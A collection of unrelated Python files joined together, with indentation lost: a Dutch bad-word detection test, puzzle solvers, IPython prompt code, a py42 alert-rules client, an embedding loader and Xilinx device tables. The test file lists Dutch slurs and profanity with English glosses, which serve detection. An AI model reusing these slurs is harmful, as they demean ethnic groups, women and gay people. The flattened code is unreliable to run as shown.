"penis", "penissen", # penis, penises
"peop", "poep", # misspelling of poep (poop)
"pijpen", # to give a blowjob
"pik", # dick
"pimel", "piemel", "piemels", # colloquial for penis (Eng: dick)
"pipi", # somewhat archaic, somewhat childish word for penis
"poep", "poepen", "poephoofd", # poop / poopy head
"poepie", "poepje", "poepjes", "poepsex", # more poop words
"poept", "poepte", "poepseks", # more poop words
"poepstamper", "poepstampen", # perjorative for gay person
"pokke", "pokken", # Smallpx
"porn", "porno", # porn
"neuk", "neuke", "neuken", "neukende", "neukt", # "fuck" conjugations
"neukte", "neukten", "geneukt", # "fuck" conjugations continued
"nicht", "nichten", # "faggot" but also sometimes "cousin"
"strond", "stront", # shit
"zuigt", "suckt", # sucks
"sukkel", "sukkels", # sucker (idiot)
"tering", # colloquial word for tuberculosis, now a swear word;
"tiet", "tetten", "tieten", # tits
"verekte", "verkracht", "verrekte", # "damn" or "fucking" (adj)
"verkracht", "verkrachten", # rape/raped
"dikzak", # fat person
"mogolen", "mogool", "mongool", "mongolen", # perj. for down syndrome
"mooiboy", # man who puts a lot of effort into his appearance
"sperma", # sperm
"kut", "kutje", "kutjes", # vulgar word for vagina (Eng.: cunt)
"stelletje", # "bunch of", as part of a racial slur or perj.
"lul", # dick
"lullen", # out of an ass
"lulltje", # weak person
"reet", # buttcrack, often used in an idiom that means "don't give a shit"
"slet", # slut
"scheet", "scheten", # fart
"schijt", # shit
"tyfus", # Typhoid
"smeerlap", # literally: "grease rag"
"het zuigt", # "It sucks"
"sukkel", # "Sucker"
"sul", # "wimp", "dork", or "schlemiel". Its etymology is unclear.
"vreten", # rude form of the verb "to eat"
"vuil", "vuile", # "filth" or "filthy"
"wijf", "kutwijf", "kankerhoer", "rothoer", "vishoer", # perj for women
# Racial slurs
"bamivreter", # "bami eater" an ethnic slur used against people of Asian
"bosneger", # literally: "bushnegro"
"geitenneuker", # literally: "goat fucker"
"kakker", # "crapper" -- higher social class idiot
"koelie", # "coolie" Indonesian laborer
"lijp", # slur for Jewish people and "slow", "dumb", "sluggish"
"mocro", # people of Moroccan descent
"mof", "moffenhoer", "mofrica", # ethnic slur used for german people
"neger", "negers", "nikker", # n-word
"poepchinees", # "poop Chinese"
"roetmop", # ethnic slur for black people.
"spaghettivreter", "pastavreter", # perj. for people of Italian descent
"loempiavouwer", # "spring roll folder" people of Vietnamese descent
"spleetoog", # "slit eye" term for people of Asian descent
"tuig", # "scum"
"zandneger", # "sand negro" an ethnic slur for people of Middle Eastern
# Religion
"gadverdamme", "godverdomme", "gadver", "getverderrie", # "god damn"
"getver", "verdomme", "verdamme", "verdorie", # "god damn" continued
"godskolere", # "god fury"
"graftak", # "grave branch" an old, moody, cranky person.
"jezus christus", "jezus", "tjezus", "jeetje", "jezus mina", # Jesus
"jesses", "jasses", "harrejasses", "here jezus", # Jesus continued
]
INFORMAL = [
"aap", "aapjes",
"banaan",
"bent",
"boe", "boeit",
"doei"
"dombo", "domme",
"eigelijk",
"godverdomme",
"groetjes",
"gwn",
"hoi",
"hallo", "halloo",
"heb",
"heej", "heey", "heeel",
"hou", "houd",
"hoihoi", "hoii", "hoiii",
"hoor",
"izan",
"jij",
"jou",
"jullie",
"kaas",
"klopt",
"kots",
"kusjes",
"lekker", "lekkere", "lkkr",
"maarja",
"mama",
"nou",
"oma",
"ofzo",
"oke",
"snap",
"stinken", "stinkt",
"stoer",
"swek",
"vies", "vieze",
"vind",
"vuile",
"zielig",
"zooi",
"zeg"
]
OTHER = [
"""
De stemtoonhoogte is de toonhoogte van de kamertoon. Door middel van een
stemvork is deze kamertoon beschikbaar voor het stemmen van een
muziekinstrument.
Internationaal is deze toonhoogte in het midden van de 20e eeuw vastgesteld
op een frequentie van 440 Hz. De stemtoon lag echter niet altijd vast. Soms
leest men ergens dat de stemtoon door de eeuwen heen steeds hoger is komen
te liggen, maar dat is slechts de helft van het verhaal. Er waren orgels
die een hogere stemtoon hadden, en later lager gestemd werden. Kerkorgels
verschilden enorm van stemtoon. In de loop van de tijd is die variatie
steeds kleiner geworden. Naarmate mensen steeds mobieler werden, ontstond
ook de behoefte aan meer compatibiliteit van instrumenten.
"""
]
def test_badwords():
compare_extraction(dutch.badwords.revision.datasources.matches, BAD, OTHER)
assert dutch.badwords == pickle.loads(pickle.dumps(dutch.badwords))
def test_informals():
compare_extraction(dutch.informals.revision.datasources.matches,
INFORMAL, OTHER)
assert dutch.informals == pickle.loads(pickle.dumps(dutch.informals))
def test_dictionary():
cache = {revision_oriented.revision.text: 'Door middel van een worngly.'}
assert (solve(dutch.dictionary.revision.datasources.dict_words, cache=cache) ==
["Door", "middel", "van", "een"])
assert (solve(dutch.dictionary.revision.datasources.non_dict_words,
cache=cache) ==
["worngly"])
assert dutch.dictionary == pickle.loads(pickle.dumps(dutch.dictionary))
def test_stopwords():
cache = {revision_oriented.revision.text: 'Door middel van een!'}
assert (solve(dutch.stopwords.revision.datasources.stopwords, cache=cache) ==
["Door", "van", "een"])
assert (solve(dutch.stopwords.revision.datasources.non_stopwords,
cache=cache) ==
["middel"])
assert dutch.stopwords == pickle.loads(pickle.dumps(dutch.stopwords))
def test_stemmed():
cache = {revision_oriented.revision.text: 'Door middel van een!'}
assert (solve(dutch.stemmed.revision.datasources.stems, cache=cache) ==
["dor", "middel", "van", "een"])
assert dutch.stemmed == pickle.loads(pickle.dumps(dutch.stemmed))
|
# ======================================================================
# Crab Combat
# Advent of Code 2020 Day 22 -- Eric Wastl -- https://adventofcode.com
#
# Python implementation by Dr. Dean Earl Wright III
# ======================================================================
# ======================================================================
# g a m e . p y
# ======================================================================
"A solver for the Advent of Code 2020 Day 22 puzzle"
# ----------------------------------------------------------------------
# import
# ----------------------------------------------------------------------
import player
# ----------------------------------------------------------------------
# constants
# ----------------------------------------------------------------------
# ======================================================================
# Game
# ======================================================================
class Game(object): # pylint: disable=R0902, R0205
"Object for Crab Combat"
def __init__(self, text=None, part2=False):
# 1. Set the initial values
self.part2 = part2
self.text = text
self.players = []
self.previous = set()
self.winner = None
self.rounds = 0
# 2. Process text (if any)
if text is not None and len(text) > 0:
self._process_text(text)
def _process_text(self, text):
"Read the input text and create the players"
# 1. We don't have a player yet
plyr = None
# 2. Loop for all of the lines of the text
for line in text:
# 3. If this is a player line, create them
if line.startswith('Player'):
plyr = player.Player(part2=self.part2, number=int(line[:-1].split()[1]))
self.players.append(plyr)
# 4. Else add the card to the current player
else:
plyr.add_card(int(line))
def who_is_the_winner(self):
"Returns the winning player or None if there is none"
if self.winner is None:
if self.players[0].lost():
self.winner = 1
elif self.players[1].lost():
self.winner = 0
return self.winner
def round_one(self):
"Play a round with the part 1 rules"
# 1. Get cards from both players
card0 = self.players[0].get_top_card()
card1 = self.players[1].get_top_card()
# 2. Determine the winner who gets to keep both cards
if card0 > card1:
self.players[0].keep(card0, card1)
else:
self.players[1].keep(card1, card0)
# 3. Update the number of rounds
self.rounds += 1
def get_game_hash(self):
"Returns the hash for this game"
# 1. Get all of the cards
cards = []
cards.extend(self.players[0].cards)
cards.append(0)
cards.extend(self.players[1].cards)
# 2. And return the string representation of that as the hash
return str(cards)
def round_two(self, limit=0):
"Play a round with the part 2 rules"
# 1. Infinate game prevention
game_hash = self.get_game_hash()
#print(game_hash, self.players[0].cards, self.players[1].cards)
if game_hash in self.previous:
self.winner = 0
self.rounds += 1
return
self.previous.add(game_hash)
# 2. Get cards from both players
card0 = self.players[0].get_top_card()
card1 = self.players[1].get_top_card()
#print(card0, card1, len(self.players[0].cards), len(self.players[0].cards))
# 3. Check for recursion
if card0 > len(self.players[0].cards) or card1 > len(self.players[1].cards):
# 4. Someone (or both) has too few cards to recuse, just play like part 1
#print("not recursing")
if card0 > card1:
self.players[0].keep(card0, card1)
else:
self.players[1].keep(card1, card0)
self.rounds += 1
# 6. And now we (and now we (and now we (recurse)))
else:
# 7. Start a new game
#print("starting a new game")
new_game = self.clone([card0, card1])
# 8. Get the winner of the new game
winner = new_game.play(limit=limit)
self.rounds += new_game.rounds
# 9. Give the cards to the winner
if winner is not None:
if winner == 0:
self.players[0].keep(card0, card1)
else:
print("player 2 wins the recursion")
self.players[1].keep(card1, card0)
def play(self, limit=0):
"play the game until there is a winner"
# 1. Keep track of the number of rounds
max_rounds = limit
if max_rounds == 0:
max_rounds = 9999999
# 2. Loop until there is a winner
while self.who_is_the_winner() is None and self.rounds < max_rounds:
# 3. Play a round
if self.part2:
self.round_two(limit=max_rounds - self.rounds)
else:
self.round_one()
# 4. Return the winning player
if self.rounds >= max_rounds:
return None
return self.who_is_the_winner()
def clone(self, cards):
"Create a copy of the current game for recurion"
# 1. Create a new empty game
other = Game(part2=self.part2)
# 2. Add the players to it
for card, plyr in zip(cards, self.players):
other.players.append(plyr.clone(card))
# 3. Return a new game that is ready for recursion
return other
def part_one(self, verbose=False, limit=0):
"Returns the solution for part one"
assert verbose in [True, False]
assert limit >= 0
# 1. Play the game until there is a winner
winner = self.play()
if winner is None:
return None
# 1. Return the solution for part one
return self.players[winner].score()
def part_two(self, verbose=False, limit=0):
"Returns the solution for part two"
assert verbose in [True, False]
assert limit >= 0
# 1. Play the game until there is a winner
winner = self.play(limit=limit)
if winner is None:
return None
# 1. Return the solution for part two
print("Played %d rounds" % self.rounds)
return self.players[winner].score()
# ----------------------------------------------------------------------
# module initialization
# ----------------------------------------------------------------------
if __name__ == '__main__':
pass
# ======================================================================
# end g a m e . p y end
# ======================================================================
|
# -*- coding: utf-8 -*-
"""
Problem Statement
You have 4 types of lego blocks, of sizes (1 x 1 x 1), (1 x 1 x 2), (1 x 1 x 3), and (1 x 1 x 4). Assume that you have
an infinite number of blocks of each type.
Using these blocks, you want to make a wall of height N and width M. The wall should not have any holes in it. The wall
you build should be one solid structure. A solid structure can be interpreted in one of the following ways:
(1)It should not be possible to separate the wall along any vertical line without cutting any lego block used to build
the wall.
(2)You cannot make a vertical cut from top to bottom without cutting one or more lego blocks.
The blocks can only be placed horizontally. In how many ways can the wall be built?
"""
__author__ = 'Danyang'
MOD = 1000000007
class Solution(object):
def __init__(self):
self.lens = [1, 2, 3, 4]
def solve(self, cipher):
"""
f[i][j] represents the number of combinations for size i*j wall, not necessarily solid
f[i][j] = f[1][j]**i
s[i][j] represents the number of combinations for size i*j wall, solid
s[h][w] = f(h,w) - sum(f[h][w-i]*s[h][i] for i)
To solve TLE:
1. s[h][w] not rely on previous h, simplify to s[w]
2. power takes time, take memory to save time for f[1][j]**i
:param cipher:
:return:
"""
N, M = cipher
f = [0 for _ in xrange(M + 1)]
s = [0 for _ in xrange(M + 1)]
f[0] = 1
for j in xrange(1, M + 1):
for l in self.lens:
if j - l >= 0:
f[j] += f[j - l]
f[j] %= MOD
f_N = map(lambda x: pow(x, N, MOD), f)
for j in xrange(1, M + 1):
s[j] = f_N[j]
if s[j] <= 0: break
for k in xrange(1, j): # sum
s[j] -= f_N[j - k] * s[k]
s[j] %= MOD
return s[M]
class Solution_TLE(object):
def __init__(self):
self.lens = [1, 2, 3, 4]
def solve(self, cipher):
"""
f[i][j] represents the number of combinations for size i*j, not necessarily solid
f[i][j] = f[1][j]**i
s[i][j] represents the number of combinations for size i*j, solid
s[h][w] = f(h,w) - sum(f[h][w-i]*s[h][i])
be careful with TLE
:param cipher:
:return:
"""
N, M = cipher
f = [[0 for _ in xrange(M + 1)] for _ in xrange(N + 1)]
s = [[0 for _ in xrange(M + 1)] for _ in xrange(N + 1)]
f[1][0] = 1
for j in xrange(1, M + 1):
for l in self.lens:
if j - l >= 0:
f[1][j] += f[1][j - l]
f[1][j] %= MOD
for i in xrange(2, N + 1):
for j in xrange(1, M + 1):
f[i][j] = f[i - 1][j] * f[1][j]
f[i][j] %= MOD
for i in xrange(1, N + 1):
for j in xrange(1, M + 1):
s[i][j] = f[i][j]
if s[i][j] <= 0: break
for k in xrange(1, j): # sum
s[i][j] -= f[i][j - k] * s[i][k]
s[i][j] %= MOD
return s[N][M]
def solve_error(self, cipher):
"""
f[i][j] represents the number of combinations for size i*j
f[i][j+1] = iC1*f[i-1][j]*f[1][j+1]
= iC2*f[i-2][j]*f[1][j+1]^2
...
(need careful math proof of the equivalent points
:param cipher: the cipher
"""
N, M = cipher
f = [[0 for _ in xrange(M + 1)] for _ in xrange(N + 1)]
f[1][1] = 1
for j in xrange(1, M + 1):
for l in self.lens:
if j - l >= 1:
f[1][j] += f[1][j - l]
for j in xrange(1, M + 1):
f[1][j] -= f[1][j - 1]
for i in xrange(2, N + 1):
for j in xrange(1, M + 1):
cmb = i
for l in xrange(1, i + 1):
f[i][j] += cmb * f[i - l][j - 1] * (f[1][j] ** i) # equivalent
cmb = cmb * (i - l) / (l + 1)
return f[N][M]
if __name__ == "__main__":
import sys
f = open("0.in", "r")
# f = sys.stdin
solution = Solution()
testcases = int(f.readline().strip())
for t in xrange(testcases):
# construct cipher
cipher = map(int, f.readline().strip().split(' '))
# solve
s = "%s\n" % (solution.solve(cipher))
print s,
|
import datetime
from server.ShiftManagerService import db
import json
''''
STILL NOT IN USE
'''
class shift:
def __init__(self, company_id, shift_id):
shift_from_db = db.get_shift(company_id,shift_id)
if shift_from_db is not None:
self.__dict__.update(shift_from_db)
def __delete_field(self,data, field):
'''
Safe delete field from a dict
'''
check_for_del = data.get(field, None)
if check_for_del:
del data[field]
|
# ! Testes de concatenação com atribuição de valores
#n1 = int(input('Digite o primeiro numero \n'))
#n2 = int(input('Digite o segundo numero \n'))
#n3 = n1 + n2
#print('A soma dos numeros é ', n1 + n2)
#print('A soma entre ', n1, ' e ', n2, 'é ', n3)
#print('A soma dos numeros é {}'.format(n3))
#print('A soma entre {} e {} é {}'.format(n1,n2,n3))
#OU
#print('A soma entre {0} e {1} é {2}'.format(n1,n2,n3))
#n = input('Digite um valor \n')
#print(n.isnumeric())
# isnumeric para numeros ou isalpha para alfabetico
|
"""Terminal input and output prompts."""
from __future__ import print_function
from pygments.token import Token
import sys
from IPython.core.displayhook import DisplayHook
from prompt_toolkit.layout.utils import token_list_width
class Prompts(object):
def __init__(self, shell):
self.shell = shell
def in_prompt_tokens(self, cli=None):
return [
(Token.Prompt, 'In ['),
(Token.PromptNum, str(self.shell.execution_count)),
(Token.Prompt, ']: '),
]
def _width(self):
return token_list_width(self.in_prompt_tokens())
def continuation_prompt_tokens(self, cli=None, width=None):
if width is None:
width = self._width()
return [
(Token.Prompt, (' ' * (width - 5)) + '...: '),
]
def rewrite_prompt_tokens(self):
width = self._width()
return [
(Token.Prompt, ('-' * (width - 2)) + '> '),
]
def out_prompt_tokens(self):
return [
(Token.OutPrompt, 'Out['),
(Token.OutPromptNum, str(self.shell.execution_count)),
(Token.OutPrompt, ']: '),
]
class ClassicPrompts(Prompts):
def in_prompt_tokens(self, cli=None):
return [
(Token.Prompt, '>>> '),
]
def continuation_prompt_tokens(self, cli=None, width=None):
return [
(Token.Prompt, '... ')
]
def rewrite_prompt_tokens(self):
return []
def out_prompt_tokens(self):
return []
class RichPromptDisplayHook(DisplayHook):
"""Subclass of base display hook using coloured prompt"""
def write_output_prompt(self):
sys.stdout.write(self.shell.separate_out)
# If we're not displaying a prompt, it effectively ends with a newline,
# because the output will be left-aligned.
self.prompt_end_newline = True
if self.do_full_cache:
tokens = self.shell.prompts.out_prompt_tokens()
prompt_txt = ''.join(s for t, s in tokens)
if prompt_txt and not prompt_txt.endswith('\n'):
# Ask for a newline before multiline output
self.prompt_end_newline = False
if self.shell.pt_cli:
self.shell.pt_cli.print_tokens(tokens)
else:
sys.stdout.write(prompt_txt)
|
from py42.services import BaseService
class AlertRulesService(BaseService):
"""A service to manage Alert Rules."""
_version = u"v1"
_resource = u"Rules/"
_api_prefix = u"/svc/api/{}/{}".format(_version, _resource)
def __init__(self, connection, user_context, user_profile_service):
super(AlertRulesService, self).__init__(connection)
self._user_context = user_context
self._user_profile_service = user_profile_service
self._exfiltration = None
self._cloud_share = None
self._file_type_mismatch = None
@property
def exfiltration(self):
if not self._exfiltration:
tenant_id = self._user_context.get_current_tenant_id()
self._exfiltration = ExfiltrationService(self._connection, tenant_id)
return self._exfiltration
@property
def cloudshare(self):
if not self._cloud_share:
tenant_id = self._user_context.get_current_tenant_id()
self._cloud_share = CloudShareService(self._connection, tenant_id)
return self._cloud_share
@property
def filetypemismatch(self):
if not self._file_type_mismatch:
tenant_id = self._user_context.get_current_tenant_id()
self._file_type_mismatch = FileTypeMismatchService(
self._connection, tenant_id
)
return self._file_type_mismatch
def add_user(self, rule_id, user_id):
tenant_id = self._user_context.get_current_tenant_id()
user_details = self._user_profile_service.get_by_id(user_id)
user_aliases = user_details.data.get(u"cloudUsernames") or []
data = {
u"tenantId": tenant_id,
u"ruleId": rule_id,
u"userList": [
{u"userIdFromAuthority": user_id, u"userAliasList": user_aliases}
],
}
uri = u"{}{}".format(self._api_prefix, u"add-users")
return self._connection.post(uri, json=data)
def remove_user(self, rule_id, user_id):
user_ids = [user_id]
tenant_id = self._user_context.get_current_tenant_id()
data = {u"tenantId": tenant_id, u"ruleId": rule_id, u"userIdList": user_ids}
uri = u"{}{}".format(self._api_prefix, u"remove-users")
return self._connection.post(uri, json=data)
def remove_all_users(self, rule_id):
tenant_id = self._user_context.get_current_tenant_id()
data = {u"tenantId": tenant_id, u"ruleId": rule_id}
uri = u"{}{}".format(self._api_prefix, u"remove-all-users")
return self._connection.post(uri, json=data)
class CloudShareService(BaseService):
_version = u"v1"
_resource = u"query-cloud-share-permissions-rule"
_api_prefix = u"/svc/api/{}/Rules/{}".format(_version, _resource)
def __init__(self, connection, tenant_id):
super(CloudShareService, self).__init__(connection)
self._tenant_id = tenant_id
def get(self, rule_id):
"""Fetch cloud share alert rule by rule id.
Args:
rule_id (str): Observer rule Id of a rule to be fetched.
Returns
:class:`py42.response.Py42Response`
"""
data = {u"tenantId": self._tenant_id, u"ruleIds": [rule_id]}
return self._connection.post(self._api_prefix, json=data)
class ExfiltrationService(BaseService):
_version = u"v1"
_resource = u"query-endpoint-exfiltration-rule"
_api_prefix = u"/svc/api/{}/Rules/{}".format(_version, _resource)
def __init__(self, connection, tenant_id):
super(ExfiltrationService, self).__init__(connection)
self._tenant_id = tenant_id
def get(self, rule_id):
"""Fetch exfiltration alert rule by rule id.
Args:
rule_id (str): Observer rule Id of a rule to be fetched.
Returns
:class:`py42.response.Py42Response`
"""
data = {u"tenantId": self._tenant_id, u"ruleIds": [rule_id]}
return self._connection.post(self._api_prefix, json=data)
class FileTypeMismatchService(BaseService):
_version = u"v1"
_resource = u"query-file-type-mismatch-rule"
_api_prefix = u"/svc/api/{}/Rules/{}".format(_version, _resource)
def __init__(self, connection, tenant_id):
super(FileTypeMismatchService, self).__init__(connection)
self._tenant_id = tenant_id
def get(self, rule_id):
"""Fetch File type mismatch alert rules by rule id.
Args:
rule_id (str): Observer rule Id of a rule to be fetched.
Returns
:class:`py42.response.Py42Response`
"""
data = {u"tenantId": self._tenant_id, u"ruleIds": [rule_id]}
return self._connection.post(self._api_prefix, json=data)
|
import json
from config.config import data_path_config
import numpy as np
from collections import defaultdict
import pickle
import datetime
def build_vocab_emb(data_path):
# opt = data_path_config(data_path)
# data_path = opt["data"]["embedding_weight"]
vec_tabs = {}
vec_size = 0
UNK = 0
i = 0
with open(data_path, 'r', encoding='UTF-8')as file:
for line in file.readlines():
tokens = line.strip().split(" ")
extword = tokens[0]
vec = tokens[1:]
vec_size = len(vec)
vec_tabs[extword] = np.asarray(vec, dtype=np.float32)
api2id = {words: idx + 1 for idx, words in enumerate(vec_tabs.keys())}
api2id['<UNK>'] = UNK
id2api = {idx: word for word, idx in api2id.items()}
vocab_size = len(api2id)
embedding_weight = np.zeros((vocab_size, vec_size), dtype=np.float32)
for word, i in api2id.items():
if i != UNK:
embedding_weight[i] = vec_tabs[word]
# 给oov词附随机值embedding_weight[self.UNK] = np.random.uniform(-0.22,0.25,vec_size)
embedding_weight[UNK] = np.mean(embedding_weight, 0) / np.std(embedding_weight)
#print(type(embedding_weight))
return embedding_weight,api2id,id2api
def build_train_data(data_path,vocab):
opt = data_path_config(data_path)
raw_data_path = opt["data"]["raw_seq_data"]
UNK = 0
seq2id = []
train_data = defaultdict(list)
with open(raw_data_path, "r", encoding="utf-8")as file:
for inst in file.readlines():
seq = inst.strip().split(" ")
if isinstance(seq,list):
seq2id.append([vocab.get(api,UNK) for api in seq])
else:
seq2id.append(vocab.get(seq,UNK))
for k,v in vocab.items():
for oneseq in seq2id:
for i,id in enumerate(oneseq):
if id == v and len(oneseq) < 50:
train_data[(v,i)].append(oneseq)
datetime.datetime.now()
with open("API/train_data","wb")as file:
pickle.dump(train_data,file)
print(111)
if __name__ == "__main__":
data_path = "API/embedding_api_256dd.txt"
embedding_weight,vocab,Rvocab = build_vocab_emb(data_path)
data_path1= "../config/api_data_path.json"
build_train_data(data_path1,vocab)
|
# /*
# * Copyright (c) 2019,2020,2021 Xilinx Inc. All rights reserved.
# *
# * Author:
# * Ben Levinsky <ben.levinsky@xilinx.com>
# * Izhar Shaikh <izhar.ameer.shaikh@xilinx.com>
# *
# * SPDX-License-Identifier: BSD-3-Clause
# */
from enum import IntEnum
class REQ_USAGE(IntEnum):
REQ_NO_RESTRICTION = 0
REQ_SHARED = 1
REQ_NONSHARED = 2
REQ_TIME_SHARED = 3
# if this bit combination is on for usage offset, the meaning is as described below
req_usage_message = "Device usage policies"
req_usage = {
REQ_USAGE.REQ_NO_RESTRICTION:
"device accessible from all subsystem",
REQ_USAGE.REQ_SHARED:
"device simultaneously shared between two or more subsystems",
REQ_USAGE.REQ_NONSHARED:
"device exclusively reserved by one subsystem, always",
REQ_USAGE.REQ_TIME_SHARED:
"device is time shared between two or more subsystems",
}
usage_mask = 0x3
def usage(flags):
msg = "# usage: "
msg += req_usage[flags & usage_mask]
return msg
class REGION_SECURITY(IntEnum):
ACCESS_FROM_SECURE = 0
ACCESS_FROM_NONSECURE = 1
req_security_message = "Device/Memory region security status requirement per TrustZone."
req_security = {
REGION_SECURITY.ACCESS_FROM_SECURE:
"Device/Memory region only allows access from secure masters",
REGION_SECURITY.ACCESS_FROM_NONSECURE:
"Device/Memory region allow both secure or non-secure masters",
}
security_mask = 0x4
security_offset = 0x2
def security(flags):
msg = "# security: "
msg += req_security[(flags & security_mask) >> security_offset]
return msg
class RDWR_POLICY(IntEnum):
ALLOWED = 0
NOT_ALLOWED = 1
# this map is only applicable for memory regions
req_rd_wr_message = "Read/Write access control policy"
req_rd_wr = {
RDWR_POLICY.ALLOWED: "Transaction allowed",
RDWR_POLICY.NOT_ALLOWED: "Transaction not Allowed",
}
rd_policy_mask = 0x8
rd_policy_offset = 0x3
wr_policy_mask = 0x10
wr_policy_offset = 0x4
rw_message = "Read/Write access control policy."
def read_policy(flags):
msg = "# read policy: "
msg += req_rd_wr[(flags & rd_policy_mask) >> rd_policy_offset]
return msg
def write_policy(flags):
msg = "# write policy: "
msg += req_rd_wr[(flags & wr_policy_mask) >> wr_policy_offset]
return msg
nsregn_check_mask = 0x20
nsregn_check_offset = 0x5
class NSREGN_POLICY(IntEnum):
RELAXED = 0
STRICT = 1
nsregn_message = "Non-secure memory region check type policy."
nsregn = {
NSREGN_POLICY.RELAXED: "RELAXED",
NSREGN_POLICY.STRICT: "STRICT",
}
def nsregn_policy(flags):
msg = "# Non-secure memory region check type policy: "
msg += nsregn[(flags & nsregn_check_mask) >> nsregn_check_offset]
return msg
capability_offset = 0x8
capability_mask = 0x7F00
cap_message = "capability: "
def capability_policy(flags):
msg = "# Capability policy: "
msg += hex((flags & capability_mask) >> capability_offset)
return msg
prealloc_offset = 6
prealloc_mask = (0x1 << 6)
class PREALLOC(IntEnum):
NOT_REQUIRED = 0
REQUIRED = 1
prealloc = {
PREALLOC.NOT_REQUIRED: "prealloc not required",
PREALLOC.REQUIRED: "prealloc required",
}
prealloc_message = "prealloc policy "
def prealloc_policy(flags):
msg = "# Preallocation policy: "
msg += prealloc[(flags & prealloc_mask) >> prealloc_offset]
return msg
def prealloc_detailed_policy(flags):
msg = "# Preallocation detailed: "
caps = [
"full access", "preserve context", "emit wake interrupts",
"not usable", "secure access", "coherent access", "virtualized access"
]
for index, s in enumerate(caps):
match = ((0x1 << index) & flags) >> index
if match == 1:
msg += " " + s
return msg
class Requirement:
def __init__(self, subsystem, node, prealloc, capability, nsregn_policy,
read_policy, write_policy, security, usage):
self.prealloc = prealloc
self.capability = capability
self.nsregn_policy = nsregn_policy
self.read_policy = read_policy
self.write_policy = write_policy
self.security = security
self.usage = usage
self.subsystem = subsystem
self.node = node
def mem_regn_node(node_id):
return ((0x3F << 20) & node_id) == 0x300000
misc_devices = {
"mailbox@ff320000": "PM_DEV_IPI_0",
"mailbox@ff390000": "PM_DEV_IPI_1",
"mailbox@ff310000": "PM_DEV_IPI_2",
"mailbox@ff330000": "PM_DEV_IPI_3",
"mailbox@ff340000": "PM_DEV_IPI_4",
"mailbox@ff350000": "PM_DEV_IPI_5",
"mailbox@ff360000": "PM_DEV_IPI_6",
"watchdog@ff120000": "PM_DEV_SWDT_LPD",
}
xlnx_pm_mem_node_to_base = {
"PM_DEV_OCM_0": 0xff960000,
"PM_DEV_OCM_1": 0xff960000,
"PM_DEV_OCM_2": 0xff960000,
"PM_DEV_OCM_3": 0xff960000,
"PM_DEV_TCM_0_A": 0xffe00000,
"PM_DEV_TCM_0_B": 0xffe20000,
"PM_DEV_TCM_1_A": 0xffe90000,
"PM_DEV_TCM_1_B": 0xffeb0000,
}
xlnx_pm_devname_to_id = {
"PM_DEV_PLD_0": 0x18700000,
"PM_DEV_PMC_PROC": 0x18104001,
"PM_DEV_PSM_PROC": 0x18108002,
"PM_DEV_ACPU_0": 0x1810c003,
"PM_DEV_ACPU_1": 0x1810c004,
"PM_DEV_RPU0_0": 0x18110005,
"PM_DEV_RPU0_1": 0x18110006,
"PM_DEV_OCM_0": 0x18314007,
"PM_DEV_OCM_1": 0x18314008,
"PM_DEV_OCM_2": 0x18314009,
"PM_DEV_OCM_3": 0x1831400a,
"PM_DEV_TCM_0_A": 0x1831800b,
"PM_DEV_TCM_0_B": 0x1831800c,
"PM_DEV_TCM_1_A": 0x1831800d,
"PM_DEV_TCM_1_B": 0x1831800e,
"PM_DEV_L2_BANK_0": 0x1831c00f,
"PM_DEV_DDR_0": 0x18320010,
"PM_DEV_USB_0": 0x18224018,
"PM_DEV_GEM_0": 0x18224019,
"PM_DEV_GEM_1": 0x1822401a,
"PM_DEV_SPI_0": 0x1822401b,
"PM_DEV_SPI_1": 0x1822401c,
"PM_DEV_I2C_0": 0x1822401d,
"PM_DEV_I2C_1": 0x1822401e,
"PM_DEV_CAN_FD_0": 0x1822401f,
"PM_DEV_CAN_FD_1": 0x18224020,
"PM_DEV_UART_0": 0x18224021,
"PM_DEV_UART_1": 0x18224022,
"PM_DEV_GPIO": 0x18224023,
"PM_DEV_TTC_0": 0x18224024,
"PM_DEV_TTC_1": 0x18224025,
"PM_DEV_TTC_2": 0x18224026,
"PM_DEV_TTC_3": 0x18224027,
"PM_DEV_SWDT_LPD": 0x18224028,
"PM_DEV_SWDT_FPD": 0x18224029,
"PM_DEV_OSPI": 0x1822402a,
"PM_DEV_QSPI": 0x1822402b,
"PM_DEV_GPIO_PMC": 0x1822402c,
"PM_DEV_I2C_PMC": 0x1822402d,
"PM_DEV_SDIO_0": 0x1822402e,
"PM_DEV_SDIO_1": 0x1822402f,
"PM_DEV_RTC": 0x18224034,
"PM_DEV_ADMA_0": 0x18224035,
"PM_DEV_ADMA_1": 0x18224036,
"PM_DEV_ADMA_2": 0x18224037,
"PM_DEV_ADMA_3": 0x18224038,
"PM_DEV_ADMA_4": 0x18224039,
"PM_DEV_ADMA_5": 0x1822403a,
"PM_DEV_ADMA_6": 0x1822403b,
"PM_DEV_ADMA_7": 0x1822403c,
"PM_DEV_IPI_0": 0x1822403d,
"PM_DEV_IPI_1": 0x1822403e,
"PM_DEV_IPI_2": 0x1822403f,
"PM_DEV_IPI_3": 0x18224040,
"PM_DEV_IPI_4": 0x18224041,
"PM_DEV_IPI_5": 0x18224042,
"PM_DEV_IPI_6": 0x18224043,
"PM_DEV_SOC": 0x18428044,
"PM_DEV_DDRMC_0": 0x18520045,
"PM_DEV_DDRMC_1": 0x18520046,
"PM_DEV_DDRMC_2": 0x18520047,
"PM_DEV_DDRMC_3": 0x18520048,
"PM_DEV_GT_0": 0x1862c049,
"PM_DEV_GT_1": 0x1862c04a,
"PM_DEV_GT_2": 0x1862c04b,
"PM_DEV_GT_3": 0x1862c04c,
"PM_DEV_GT_4": 0x1862c04d,
"PM_DEV_GT_5": 0x1862c04e,
"PM_DEV_GT_6": 0x1862c04f,
"PM_DEV_GT_7": 0x1862c050,
"PM_DEV_GT_8": 0x1862c051,
"PM_DEV_GT_9": 0x1862c052,
"PM_DEV_GT_10": 0x1862c053,
"PM_DEV_EFUSE_CACHE": 0x18330054,
"PM_DEV_AMS_ROOT": 0x18224055,
"PM_DEV_AIE": 0x18224072,
"PM_DEV_IPI_PMC": 0x18224073,
}
xlnx_pm_devid_to_name = {
0x18700000: 'PM_DEV_PLD_0',
0x18104001: 'PM_DEV_PMC_PROC',
0x18108002: 'PM_DEV_PSM_PROC',
0x1810c003: 'PM_DEV_ACPU_0',
0x1810c004: 'PM_DEV_ACPU_1',
0x18110005: 'PM_DEV_RPU0_0',
0x18110006: 'PM_DEV_RPU0_1',
0x18314007: 'PM_DEV_OCM_0',
0x18314008: 'PM_DEV_OCM_1',
0x18314009: 'PM_DEV_OCM_2',
0x1831400a: 'PM_DEV_OCM_3',
0x1831800b: 'PM_DEV_TCM_0_A',
0x1831800c: 'PM_DEV_TCM_0_B',
0x1831800d: 'PM_DEV_TCM_1_A',
